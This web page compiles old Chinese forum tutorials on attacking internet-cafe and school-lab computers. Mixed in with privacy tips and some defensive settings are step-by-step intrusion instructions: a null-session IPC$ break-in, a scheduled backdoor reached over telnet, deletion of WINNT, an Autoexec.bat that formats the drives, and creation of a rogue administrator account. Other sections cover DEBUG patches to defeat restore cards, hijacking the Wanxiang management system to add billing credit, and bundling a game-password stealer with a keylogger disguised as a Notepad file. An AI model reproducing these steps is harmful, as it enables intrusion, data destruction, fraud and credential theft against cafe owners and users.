本文目录一览:
U盘重置电脑密码时,进入u盘启动后,点击移除密码没反应怎么办?
可以用PE系统盘引导,进入PE系统后,运行NTPassword软件,就可以重置密码、重设新密码、解锁禁用的账户了。
关于破解网吧还原卡与还原精灵的!高手指教!!!!!!!
为了便于对网吧的管理,有许多网吧管理员都给电脑装上了各种网吧管理软件,虽然利用这些软件可以更好地对网吧进行管理,但是使用了这些软件,电脑的一些重要功能就无法使用了,比如说,使用软驱、打开下载的文件、压缩文件夹等等,这些设置让许多网友都比较头疼。在这些网吧管理软件中,“美萍安全卫士”的用户最多,接下来我们以“美萍安全卫士”为例来看看来如何察看硬盘中的文件以及对此该如何进行防范。
漏洞:打开IE浏览器后,在地址栏中输入“C:”后按“回车”键便可以察看硬盘中的资源。
防范:这种方法算是比较古老的了,我们只要在美萍安全卫士的“设置”窗口中使“管理”选项卡的“选项”选项卡将“禁止IE从地址栏访问硬盘资源”复选框选中即可。
漏洞:点击IE浏览器菜单中的“文件/另存为”,然后在弹出的窗口中选中任意一个文件夹,接下来按Shift+F10键调出鼠标右键,选择其中的“资源管理器”或“我的电脑”便可以打开选中的文件夹,由此便可以查看硬盘中的文件。
防范:在“管理”选项卡中选择“禁止”选项卡,然后点击“加入”按钮输入“浏览”便可以禁止“资源管理器”窗口的打开,而“我的电脑”的窗口没有固定的关键字,所以无法直接禁止此窗口,但是我们选中的文件夹是在“我的文档”文件夹中,要想利用这种方法打开“我的电脑”的窗口,就必须经过“我的文档”,这样我们可以再次加入“My Documents”来禁止“我的文档”窗口的打开,由此也可以禁止“我的电脑”窗口的打开。
漏洞:现在想要通过Windows自带的应用程序来察看硬盘中的文件已经比较困难了,但是我们还有更简单的方法:打开聊天工具QQ,然后点击面板上的“TE浏览器”图标启动TE浏览器,美萍所做的设置对IE管用,但是对TE却一点用都没有。不信?你在TE浏览器的地址栏中输入“C:”看看,是不是什么都出来了?
防范:你可以利用上文介绍的方法将“Tencent Explorer”加入到“管理”选项卡的“禁止”选项卡中,但是这显然不是最好的办法。其实你可以将“C:Program FilesInternet Explorer”文件夹中“Iexplore.exe”文件复制到“C:Program FilesTencent”文件夹中,然后删除Tencent文件夹中的“Tbrowser.exe”文件,最后将复制过来的“Iexplore.exe”文件改名为“Tbrowser.exe”,现在继续点击那个“TE浏览器”图标看看,弹出便是IE浏览器了。从另外一个角度讲也算禁止了TE浏览器。
建议的保护模式:现在的硬盘容量都比较大,我们可以多分出一个区来,将“我的文档”的路径更改到此分区中,然后将QQ、IE下载路径等等文件夹全部转移到这个分区中,将其余的分区隐藏,最后将这个分区在桌面上建立一个快捷方式,这样不但可以满足大家下载、使用软盘等等需要,还可以方便地删除QQ聊天纪录,保护个人的隐私。
注意:请不要利用本文所介绍的方法破坏网吧硬盘中的数据,由此产生的后果,笔者概不负责!
在网吧上网会泄密吗?是的!在打开文件、输入各种密码或用QQ与朋友聊天时,都会在机器上留下踪迹,从而泄漏个人机密。为安全起见,你应该在离开时抹去这些痕迹。
1.开始菜单泄密
在Windows的开始菜单中,会有最近访问文件的记录。当你离开网吧后,其他人完全可以通过点击“开始→文档”打开你最近看过的文件,所以,操作完文档后一定要记住清除它们。
解决办法:点击Windows的“开始”→“设置”→“任务栏和开始菜单”→“开始菜单程序”,点击“文档菜单”项目中的“清除”键即可。
2.微软的Office软件泄密
如果在网吧使用微软的Office软件编辑过重要文件,那你可要小心了,因为Office软件会在“文件”菜单中列出最近打开过的文件,其他人可以轻而易举地看到,甚至能把这些文件复制一份带走!
解决办法:以Word为例,具体做法是,选择Word中的“工具”→“选项”→“常规”,把复选框“列出最近所用文件数”前面的“打勾”标记去掉即可。
3.回收站泄密
Win9X/ME有个特性,往往并不是真正删除了文件,而是把它转移到回收站中了,而回收站中的文件是可以恢复的!所以,用完后一定要及时清空回收站!
解决办法:打开回收站,点击“文件”→“清空回收站”或者选取要删除的文件,点击“文件”→“删除”,这样操作后就真正把文件删除了。
4.一些临时文件泄密
平时如果够仔细,你会发现在电脑有一些临时文件,这些临时文件是在安装或运行某些软件时产生的,由于某种原因(如软件本身的原因或突然断电等)没能被及时删除。这些临时文件在个人电脑上顶多是占据一些硬盘空间,没什么隐患,但在网吧就不一样了,别人完全可以通过查看这些文件来了解你的喜好,揣测你曾经干过些什么。
解决办法:关闭所有运行的软件程序后,进入c:windowstemp目录下,删除里面的文件。注意:有些临时文件可能删不掉,那就重新启动一次再试试看吧!
5.浏览网址(URL)泄密
为了方便用户,Windows98具有历史记录功能,能将用户以前的各种操作一一记录下来(如运行的程序、浏览的网站、查找过的内容等)。但任何事情都有两个方面,历史记录同时也带来了泄密的可能。有些人会利用这些记录来获取你已经访问过的Web页面信息,从而窥探你的喜好。
解决办法:在浏览器中点击“工具”→“Inter-net选项”→“常规”,然后单击“历史记录”项目中的“清除历史记录”按钮即可。或者是启动注册表编辑器Regedit,并展开到HKEY-CURRENT-USERSoftwaremicrosoftInternetExplorerType-dURLs键值,该键值就是专门用于保存IE历史记录的。还愣着干嘛,快动手删除它们啊!另外,在输入网址时,按下Ctrl+0(字母O)组合键后,在弹出的窗口中填入要访问的网站名称或IP地址,你输入的URL就不会保存在地址栏内。
6.QQ密码泄漏
如果在网吧使用QQ时选择了保存密码功能,很容易让别人得到你的密码。虽然密码只以*号形式显示,不过,看*号的工具实在是太多了!
解决办法:不选择保存密码功能,离开时务必要关闭QQ。事先申请QQ密码保护也很有用,即使密码被盗,也可通过密码被盗申述取回来。
7.访问过的网页泄密
浏览器会把曾经浏览的网上信息保存在文件夹c:windowsTemporaryInternetFiles目录下,这样可以在下次访问时提高浏览效率。但这些记录一旦被那些无聊的人得到,他们就有可能从这些记录中寻找到有关个人信息的蛛丝马迹,甚至是你的信件内容(如果你是通过Web方式收发信件的话)!
解决办法:把c:windowsTemporaryInternetFiles目录下的所有文件删除。或者打开IE,点击“工具”→“Internet选项”,在弹出的对话框中单击“Internet临时文件”项目中的“删除文件”按钮,哈哈,谁也不知道你的秘密了。
8.Cookie泄密
Cookie是Web服务器发送到电脑里的数据文件,它记录了诸如用户名、口令和关于用户兴趣取向的信息。有些喜欢搞“恶作剧”的人,会利用Cookie的功能冒充你去干一些“可怕”的事情。另外,目前有许多网站,Cookie文件中的Usemame和Pass-word是不加密的明文信息,更容易泄密了!因此,在网吧上网,删除Cookies文件很是很必要。
解决办法:打开资源管理器内的c:windowscookies目录,你会发现有许多记录你个人网上信息的文件,在该文件夹下用鼠标选中除“index.dat”文件(系统自身所形成的文件)外的所有的文件,然后删除它们就可以了。此外,用鼠标单击IE菜单栏中的“工具”→“Internet选项”,选中“安全”标签,再单击标答中的“自定义级别”按钮,在打开的“安全设置”对话框中找到关于Cookie的设置,然后选择“禁用”或“提示”,就可以一劳永逸,用不着每次进行删除操作了。
9.剪贴板泄密
许多人都会使用拷贝、粘贴功能来复制文件和文字,这就使得剪贴板中必然会有相应的信息。如果你在离开网吧时没有注意及时清空剪贴板,别人就有机会把剪贴板中的内容拷贝到硬盘(剪贴板中为文件时)或文件(剪贴板中为文字时)中,如果你使用了某些剪贴板增强工具,这些工具通常会自动记录你所拷贝的文件内容和数量,即使是非正常关机都不会消失!
解决办法:离开时把剪贴板的内容清空即可。如果使用了剪贴板增强工具,一定要记得用软件自带的清除记录功能把剪贴的内容清除喔!
10.木马泄密
对付木马可能是最难的一关。如果网吧的电脑被人种下了木马程序,口令信息、邮件内容、聊天记录等个人信息都会被木马客户端得到!偏偏网吧又是下木马最方便的地方,这就使得许多网吧的电脑成了“养马场”!怎样保护自己的个人信息不被泄漏呢?
解决办法:网吧的电脑一般都装有杀毒和防黑软件,建议在上网前先检查是否有木马运行,即使杀毒黑软件报告没有发现木马也要小心。告诉你一个简单的方法:事先下载一款进程查看工具软件(如Prcview),用来查看目前运行的进程,如果发现有可疑的进程就立刻终止!
好了,有了这些招数作保障,你就可以尽情地在网上冲浪,体验网络带来的无穷乐趣了。
如何进入网吧主机绝对好用
先查它的ip IP:61.141.xxx.xxx (方法很多的)
我就打开DOS输入:net use \\61.141.xxx.xxx\ipc$
提示输入密码:
我估计是空!
直接按下[Enter]
真的被我猜中了!
接着我便继续输入:net use \\61.141.xxx.xxx\c$
提示输入密码:
我也没有理会!
谁知道这下不管用了!
找他的弱口令X-SCANNER(冰河的力作。下载地方:)扫他
我接着就映射他的c盘
net use z: \\61.141.xxx.xxx\c$
接着把NETX99放上去!
看他的时间!
net time \\61.141.xxx.xxx
他的时间是假如是下午3:02分
接着安排他的执行时间!
at \\61.141.xxx.xxx 15:04 ncx99.exe
命令成功完成!
接下来就是等时间了!
OK!到时间了!
telnet 61.141.xxx.xxx 99
进入了!
c:\rd /s /q WINNT
呵呵!
这时你会发现有很多文件拒绝访问!
不要害怕!
这是很正常的事情!
因为他有很多文件正在调用!
不过他的机器很快就会拼命报错!
直到系统崩溃!
呵呵!
对于一个网吧来说!
这个无疑是一个致命的打击!
没有主机怎么上网?
只有关门了!
呵呵!
接着就是如何获取ADMIN的权限了!
我们首先把他的C盘映射成为我们的Z盘!
开始--运行--cmd
输入:net use z: //61.141.xxx.xxx/c$ "密码" /user:"用户名"
出现:命令成功完成
这时候你打开“我的电脑”看看!
是不是多了一个Z盘?
接着不用我多说了吧?
首先必须创建一个你自己的用户名
输入:net user 用户名 "密码" /add
出现:命令成功完成
OK!
接着就是如何把你创建的用户加到ADMIN组了!
输入:net localgroup "administrators" 用户名 /add
出现:命令成功完成
呵呵!
我们把他的WINNT目录删除掉!
回到对方的MS-DOS下!
输入:rd /s /q WINNT
这时你会发现有很多文件拒绝访问!
不要害怕!
这是很正常的事情!
因为他有很多文件正在调用!
不过他的机器很快就会拼命报错!
直到系统崩溃!
够好玩的了吧?
如果对方是WIN98的话你可以把他C盘根目录下的Autoexec.bat文件改一下!
打开他的Autoexec.bat文件!
把原来的全删掉!
输入:
--------------------
@echo off
format d: /q /u
delete d:
format c: /q /u
delete c:
--------------------
保存!
等他重启后就会慢慢的格掉D盘再格C盘! 呵呵............不要干坏事呀
利用万象来控制整个网吧
在现在的信息世界,软件层出不穷,相信万象网吧管理系统这个东西大家都是左耳听进
右耳听出的吧,
什么?你还没听说过?我晕,那你肯定是在骗我,既然你懂得进入这里,那你一定知道它是
个什么样的东东。
对于一些经常在网吧上网的网络爱好者来说,系统让人锁住是一件很痛心的事情,千万百计
的想下载一个软件
来泡一下那个MM,或想炸一下那个骂自己的王八蛋,但是网吧里总是会说“当前安全设置不
允许下载”,
我靠,我又晕,怎么办?那肯定是要采取手段来干掉它啊!一堆的FEi话后,现在转入正题:
万象:一个客户端;一个控制端,网吧有N台机器,网吧老板就会装上N个客户端,客户端就
会把当前的计算
机控制端进行提供完全的共享,支持关机、锁定、计费...... 功能多得数不胜数。这些由他
的控制端可以
完全做到。哈哈,好戏开始了,既然他们网吧由一个控制端来控制,那我们为什么不自己制
造一个控制端呢?
那样我们不是也可以控制整个网吧了吗?说到这里,如果你对这些还不熟悉的话那你肯定心
动了,
好,且听下文......
我们现在的位置处于被客户端状态,先看看能不能下载.....几秒过去了,不能下载,好,我
们就让他滚蛋。
我们进入C:盘,找到,Octopus这个文件夹,(由于管理员的设置,该文件夹不一定就在C:
盘)把它改名。
什么?不能用右键?靠,好办,用鼠标按该着文件夹,用右键哦,按了大概两秒吧,我们再
按一下左键(此
时不要放开右键),哈,好了,按左键之后那些删除啊,还有复制,重命名这些菜单都给我
们滚出来了。现在
我们就可以为所欲为啦,先不要管其它的,第一个动作就是把它改名,如果你是心狠手LA的
家伙就干脆把文件
夹删掉,完成任务。(此外,调出右键的方法还有按住shift+F10 ,要先自定义调出菜单的
对象,更简单的是
按F2键。)。好了,现在我们就按计算机机中那个最小的钮,reststart,就是重新启动啦,
起动后万象就不
能动行了。现在我们直接就可以到widow的原始界面,哈哈,very good,现在我们在IE属性
里--自定义安全
级别---允许下载--成功。
现在我们先来下载两个软件,一个名为“wx1”,它名字应该是"这个吧,反正我邮箱里面是
这样显示,一个就
是万象管理系统的安装文件,由于这些涉及到整个网吧的安吧的安全,下载地址我暂时不提
供,找不到朋友跟
我联系吧?下载完毕后,我们先来打开“wx1”,它的作用就是把万象系统的全部密码显示出
来,爽。。好了,
知道密码我们就可以让这台机就死,生就生啦。下一步,万象的安装文件,当然是安装服务
端啦,好了,安装
完毕,我们现在可以看到这个网吧所有正在运行的机器,哇,足足有好几十台啊,我们随便
按一个来看看,
右键,里面有关机,远程控制,加费操作,附加......不数了,太多了,呵呵。。很多朋友
都会用冰河远程控
制,那样还要骗人家运行server.exe,这样不大好,现在是网吧老板帮我们运行了这个所谓
的server.exe啦,
所以我们进行下一步的操作。先举个例子,如果我们现在用的是限时上网,那可以给自己加
钱,一开始就给他
们一或两块钱,然后就自己加,上到明年29号晚上都是非曲一两块钱啦。如果他们是上多久
就按多久时间加费
那我们就可以过一段时间就帮自己结帐,再上机,哈哈哈,爽死了,不说了,再说我又要爽
晕了 : ) 。唉哟,
是谁用臭鸡蛋扔我啊,痛死了,我要走,生气了。唉, 还是把这个文章先写完吧。什么啊?
好像没有了?不会
吧,那么快?哈,我们现在已经有了控制端,就是等于我们现在就是老板啦,只是不能收钱
而已,就这样,现
在大家就试试吧,保证万无一失,控制整个网吧就是这样的简单。
申明:我写这编文章的目的不是教大家怎样去控制整个网吧做坏事,而是要系统管理员
吸取这样的教
训,从而为自己的网吧安全更好的着想。
最后我还是老一句:大家如果还有那些看不懂的就跟我联系吧,我的QQ是:36
117077。
★★还原卡终结篇
还原卡这无聊的东东现在好像很流行,特别是在众学校,可把同学们给还原苦了, 一旦重启,别无所有. 众人怒曰:"把机器给卸了!!!!!!!!!"
菜人俺也曾深受其害,本来做好的想给给MM们看的小程序,随着reset,一去不回了!!!!
怒从胆边生,一定要废了它.
其实破解还原卡比破解cmos还要快,*作上就那几步,只是*作上有点吓人(俺菜嘛. 本来想给这篇起名"10秒内破解硬盘还原卡",不过上次那篇"15秒内破解cmos"让众网友臭骂了一顿:"如果设了开机密码看你怎么办!!",俺无语凝噎...555555...5555555~~~ 因此还是15秒吧,踏实些!
本篇文章的目的:让从未接触过debug的弟兄,也能顺利的破解还原卡,俺也会加上适当的注释 ,权当了解吧. 说白了,就是没学过计算机的也能按照俺的步骤破解它!!!!! 高手止步,请回
原理性的东东我不想在这废话,想和俺讨论或指点俺的朋友请到
最后一 ;
废话不说了,进入正题,破解方法有2:
第一种破解率还可以.
第二种好像是万能的(俺还没碰到破解不了的----见识短的表现-
第一种:
开机时(也就是在你曾经进入cmos的时刻),同时按住ctrl+home,这样你就进入了
还原卡的密码输入窗口,只要输入正确的密码即可获得admin,以后随你怎样设置.
关于是密码的问题:一般还原卡都有默认密码的,默认密码怎么找,很简单,到网上搜索
关键词"还原卡"就行了,找到你用的那个牌子的还原卡,进入站点,在一个比较偏僻的角落
一般可以找到默认密码的.
而一般机房管理员是不会修改其默认密码的,比如俺学校的
台湾远志牌的还原卡的默认密码是12345678,
小哨兵的是manager, 机房管理员一个也没改,好爽!!!!!!!!!!
不过我可没破坏任何东东,一旦惹怒了俺,嘿嘿....俺也不会破坏的,
恶意破坏计算机就是对自己的不尊重!!!!
如果管理员把密码改了呢?那就拿出宝刀---
方法二:
此法实施过程看起来挺麻烦,不过熟悉了*作起来超不过15秒的-
高手sinister曰:
其实所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序,屏蔽了
一些功能调用如AH=3,5等,在中断向量表中INT 13的SEG,OFFSET
描述为[13h*4+2],[13h*4],将此中的程序先保存后,再替换为自己的代码,
当你AH=2的时,它便会call原始INT 13地址来完成*作.
只要找到原始INT 13入口便可以为所欲为.
不知看了这段感觉如何?慢慢消化吧.
主要矛盾:关键是要找到原始的int 13入口.
测试*作系统:win98
测试对象: 台湾远志还原卡
测试地点: 学校机房
测试目的: 控制还原卡,但不破坏.
注:本篇文章不对其实施过程中出现的任何不可预料的情况负责!!!!!
具体过程如下:
开机过程按住F8键,进入纯dos环境, 注";"后为注释.
出现提示符c:,
键入c:\debug,
- a100
- xor ax,ax
- int 13
- int3
; 寻找原始的int 13入口.
然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx
,后面的指令为:mov dl,80 (练练眼力-。按q退出.
记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。
例如俺的得到的地址是F000:9A95
再次运行debug ,键入:
-e 0:4c 95 9A 00 F0 ;e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中.
-q
注: 填的时候要仔细,填错的话会死机。ok,破解完成.
这时在提示符c:\键入
c:\win
进入win98系统即可,那么这次你在win98系统中的一切*作,随着下一次
的启动都会被还原卡存储起来。
不过下一次进入系统的的时候,你还是需要重写地址0:4c,才可以让还原卡存储你的东东。
这时只需要在纯dos下进入debug,键入
-e 0:4c 95 9A 00 F0
-q 即可。
哈哈。。。这样也挺好,只有你才是这台computer的真正的主人 -。
别人还是受还原卡的限制的except--you 。
破除网页鼠标右键的十种方法!
现在上网很多网页都有禁用鼠标右键菜单的现象,
今天冰血封情就给大家总结一下破除方法!
1、在网页上任意处将右键按下,等跳出对话框时不要放开右键,将鼠标移至对话框,用鼠标左键点“确定”,在将鼠标移动到想要的连接处,放开右键!OK!
2、同“1”,只是将鼠标移至对话框,用回车去“确认”!
3、用组合键“CTRL+F10”!
4、在页面中点击右键,当出现警告窗口时,左手按键盘上的CTRL+F4键关闭提示窗口!
以上的方法适用于仅禁用而没有隐藏右键菜单的网页
5、先用鼠标左键进入该页,记录下该页地址,用下载工具“添加新任务”强行下载!(该方法适用于可以打开的连接)
6、同“4”,但是可以查看网页源代码,找到该连接后用下载工具“添加新任务”强行下载!(该方法适合比较简单的网页)
7、可以将该网页“另存”到硬盘上,修改后直接下载!(此法适用于有主页基础的人)
8、在IE设置禁用所有的脚本文件,大胆下载后在改回原来的设置!(此方法适用于对IE设置较了解的老鸟)
9、直接将想要的图片用左键拖着,然后按下WIN+D键,这样一来就可以拖到桌面上保存!(此方法适用于单手操作较灵活的同志)
10、查看源代码如果发现用了这样的代码:
script
function stop(){
alert('XXXX,XXXX!');
return false;
}
document.oncontextmenu=stop;
/script
你可以在地址栏键入:javascript:alert(document.oncontextmenu='')回车,确定对话匡后,直接使用右键!
版权所有,如有转载,请注明出处!!
本文法律责任人为:冰血封情
关于本文任何法律责任由冰血封情承担。
黑眼睛+键盘幽灵
大家好,我又回来了~~~~~!{你是谁?谁记得你~??}不是吧~~,上次教你怎么盗传奇的ren。{什么破方法,我看你也就是虎一些菜鸟!谁要听你的!!}
这次可不一样了,由于黑眼睛软件的出世,我有所感悟!{那好~!就给你一次机会吧!快说!}谢谢!!!~~~
切入正题,传奇黑眼睛2.2版本知道吗?不知道就告诉你喽~~~()自己去下载吧。{注册码呢?}没有!{没有注册码你虎我啊~~~~,扁他!}别急!别急!我还没说完呢~~经过我一翻测试,得出的结论:可以发到信箱,可以安全的在后台工作,可以记录哪一个区,登录时间,登录IP.我想这些已经够了!结合键盘幽灵!我想大家已经知道原理了吧?因为没有注册的黑眼睛记录下的密码前两位是"**",所以要靠键盘幽灵来帮帮忙。
具体步奏:
下载三个工具。
1.传奇黑眼睛2.2(上面有)
2.键盘幽灵(●KeyGhost 3.02 键盘幽灵 注册码 Code:aKEY-3962842)
3.开山文件合并器3.0版(;down=1)
打开开山文件合并器,点击"+",找到黑眼睛的文件,打开。在点击"+",找到键盘幽灵文件,打开。然后你在选择原文件的的框体里看见着两个文件都在列表里。改改图表为好,选什么呢?选成记事本的图标吧!现在可以"合并"了起个什么名字呢?图标都是记事本了那名字一定要配合一下"Netlog"还可以吧?
{为什么不用电脑幽灵呢?}因为电脑幽灵解压后有两个辅助文件,不容易合并~~~~嘻嘻。别说我卑鄙!!
现在文件生成好了接下来的把它弄到你的邮箱里,等着到你想去的地方~~~哈哈!或者有主页空间的朋友也可以按照我那篇"网页木马再发挥"编成网页木马,那使用起来不是更方便?哈哈哈哈~~~~别说我卑鄙!!
好了,现在来说说怎么设置吧!下载的时候最好选择在当前位置运行,为什么呢??~~自己想想!!运行过后首先看到的是黑眼睛,来设置一下吧。用户名和注册码没有??那就"试用"呗!记录文件的位置就在winows下吧,C:\WINDOWS\gamelog.txt
关于还原卡破解的一些问题
还原卡破解
方法一:
开机时(也就是在你曾经进入cmos的时刻),同时按住ctrl+home,这样你就进入了 还原卡的密码输入窗口,只要输入正确的密码即可获得admin,以后随你怎样设置. 关于是密码的问题:一般还原卡都有默认密码的,默认密码怎么找,很简单,到网上搜索QQ:9750406 关键词"还原卡"就行了,找到你用的那个牌子的还原卡,进入站点,在一个比较偏僻的角落 一般可以找到默认密码的.
而一般机房管理员是不会修改其默认密码的,比如俺学校的
台湾远志牌的还原卡的默认密码是12345678,
小哨兵的是manager, 机房管理员一个也没改,好爽!!!!!!!!!!
不过我可没破坏任何东东,一旦惹怒了俺,嘿嘿....俺也不会破坏的,
恶意破坏计算机就是对自己的不尊重!!!!
如果管理员把密码改了呢?那就拿出宝刀---
方法二:
此法实施过程看起来挺麻烦,不过熟悉了*作起来超不过15秒的-
高手sinister曰:
其实所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序,屏蔽了
一些功能调用如AH=3,5等,在中断向量表中INT 13的SEG,OFFSET
描述为[13h*4+2],[13h*4],将此中的程序先保存后,再替换为自己的代码,
当你AH=2的时,它便会call原始INT 13地址来完成*作.
只要找到原始INT 13入口便可以为所欲为.
不知看了这段感觉如何?慢慢消化吧.
主要矛盾:关键是要找到原始的int 13入口.
测试*作系统:win98
测试对象: 台湾远志还原卡
测试地点: 学校机房
测试目的: 控制还原卡,但不破坏.
注:本篇文章不对其实施过程中出现的任何不可预料的情况负责!!!!!
具体过程如下:
开机过程按住F8键,进入纯dos环境, 注";"后为注释.
出现提示符c:,
键入c:\\debug,
- a100
- xor ax,ax
- int 13
- int3
; 寻找原始的int 13入口.
然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx
,后面的指令为:mov dl,80 (练练眼力-。按q退出.
记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。
例如俺的得到的地址是F000:9A95
再次运行debug ,键入:
-e 0:4c 95 9A 00 F0 ;e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中.
-q
注: 填的时候要仔细,填错的话会死机。ok,破解完成.
这时在提示符c:\\键入
c:\\win
进入win98系统即可,那么这次你在win98系统中的一切*作,随着下一次
的启动都会被还原卡存储起来。
不过下一次进入系统的的时候,你还是需要重写地址0:4c,才可以让还原卡存储你的东东。
这时只需要在纯dos下进入debug,键入
-e 0:4c 95 9A 00 F0
-q 即可。
哈哈。。。这样也挺好,只有你才是这台computer的真正的主人 -。
别人还是受还原卡的限制的except--you 。
下面是找Int13入口的方法,我常用的几种:
1。手工运行Debug,最好在纯DOS下:
Debug
- a100
- xor ax,ax 注意: 前面要加上功能号以选择Int13H内部的流程,避免进入其他不经过原始入口的流程
- int 13
- int3
然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx。记下这一地址,按q 回车退出。
这里假设了第一个F000:xxxx就是要找的入口,实际上可以在第2,3,4,。。。。出现,要自己判断一下,通常认为就是第一个。在(0:13H*4)=0:4cH 处填入这个地址。
例如得到的地址是F000:1234
运行debug
-e 0:4c 34 12 00 F0 =======把得到的原始入口填入Int13H的中断向量表
-q
注意:
填的时候要仔细,填错的话会死机。有些经过针对性处理的机器,要进一步鉴别。
如在Int13内部调用Int1ch.
如果在trace过程中发现如下代码 CMP DL,80[意思是判断是否针对硬盘操作] ,可以尝试修改成不存在的硬盘号,比如改成CMP DL,FF。其他的都不要修改.
试试 硬盘可写吗?如果可以的话就万事大吉了。另外,不能在Windows的虚拟DOS窗口中使用这种方法。
如果在Windows的虚拟DOS窗口运行的话,请使用下一种方法。
2。Debug
- s F000:0 ffff 80 fa 80 强行搜索BIOS区,通过比较入口代码找到原始入口点
你可能会发现有好几处。根据我的多次破解经验,通常这个地址在F000:8000以后。
试验一下: 如果U F000:xxxx地址后发现代码类似 -u F000:xxxx
PUSHF
CMP DL,80
JZ ....
.
.
.
[有些不是这样,要注意鉴别。]
的话,填入向量表试试。通常破解就完成了。
我曾经发现经过以上中断还原后,仍不能写盘,或者死机的情况。经跟踪发现Int8H,Int 1CH,Int15H等向量对
Int13H进行了向量保护。解决办法:把Int8H,Int1cH,Int15H 也改会原始中断点(也是BIOS中断)。尝试写盘成功
如果想获得保护卡密码的话,可以参考以下步骤:
1。找到Int13h原始点设回中断向量表。
2。读出MBR
3,分析读出的MBR,找到密码算区和加密算法
4,推算出密码
还原卡忘记密码了,有办法解决吗?
重做系统 最安全的不方法一:临时解决办法 如果在忘记还原精灵密码后,你安装了一个新程序,该软件提示要求重启计算机,此时不要点击“确定”按钮,选择“以后重启”。然后在“开始→关闭系统”中选择“重新启动计算机”,注意此时一定要按住Shift按键不放,这样计算机将直接重新加载系统程序,从而绕过还原精灵的保护。 方法二:长期解决办法 如果想长期保存自己的文件,就必须卸掉还原精灵或者取得还原精灵的管理员密码,要卸掉还原精灵其实不难,网上有专门清除还原精灵的程序“还原精灵清除器”,运行以后直接清除还原精灵的密码。不过需要注意,由于还原精灵是在硬盘最重要的主引导记录MBR里面做的文章,所以使用这个还原精灵清除器有一定的危险。 方法三:利用初始密码 还原卡都有默认的初始化密码,如果你压根儿就没有修改过它的默认密码的话,就简单多了,因为还原精灵的默认密码是12345678! 方法四:写信索取密码 在安装还原精灵时会带有一个还原精灵辅助工具,即厂商提供的密码读取工具readpwd.exe,运行它也可以得到还原精灵的加密密码,格式类似这样:[DB][B8][5E][79][3E][3B][5E][C5][BD][B2],把该加密密码发送到这个信箱:info@yuanzhi.com.cn,只需一两天就可以得到软件开发商发来的密码。 这样,无需任何软件,简单的几下就可以得到还原精灵的密码!反过来讲任何人用这个方法都可以得到还原精灵的密码,包括受限制的用户!所以大家要保存好密码读取工具readpwd.exe,将它改名隐藏或干脆删除。 方法五:重写主引导扇区 还原精灵会截取系统的底层功能调用,在硬盘的主引导区留下自己的痕迹。硬盘的主引导区存放的是系统的主引导信息、分区信息,一般说来病毒对它非常感兴趣。如果我们能先于还原精灵占有硬盘的主引导扇区(MBR),那么我们就可以对硬盘拥有最大的管理权限,换句话说,还原精灵已经被我们“干掉”了。 依据上面如上原理,用fidisk/mbr命令重写主引导扇区,然后重新启动计算机,这样还原精灵就没有了。 方法六:利用16进制文件编辑器 WinHex的内存搜索编辑功能可以帮我们找回丢失的还原精灵密码。具体方法是:右击任务栏右下角的还原精灵图标,在弹出菜单中选择“参数设置→更改密码”,在对话框中输入旧密码,胡乱填写几个数字如123456;在新密码框中输入新密码,这里也胡乱填了个371042,最后点“确定”按钮。 由于我们是胡乱输入的密码,所以旧密码是不会正确的,此时会弹出对话框,提示密码不正确,注意千万不要点击“确定”按钮,赶紧运行16进制文件编辑器WinHex,点“工具”菜单中的“RAM编辑器”,在打开的窗口中找到Hddgmon下的“主要内存”,这里的Hddgmon是还原精灵的进程。 最后,在WinHex中点击“搜寻→寻找文字”菜单选项,在打开的窗口中添入你随便填入的假密码371042。点“确定”之后,真正的密码就会出现在我们面前了! 原理:输入密码后,该软件会用其内部事先定义好的方法来计算真正的密码,与输入的密码进行比较,这个比较的过程是在内存中进行的。由于WinHex具有优秀的内存编辑功能,因此通过在内存中搜索输入的字符串,来找到它们。而一般情况下,真假密码的比较离得会很近,这样我们就可以轻松发现它们。 方法七:利用还原精灵密码读取软件 通过方法六我们不难得出结论:还原精灵存在内存中存放明文密码的漏洞,还原精灵密码读取软件,使用该软件可以轻松地得到还原精灵的密码。该软件使用方法很简单,只要打开还原精灵的“更改密码”的窗口或“检查管理员密码”的窗口,然后无需输入任何密码,只要点击该软件的“读取”按钮,就会自动从还原精灵的内存中读取密码。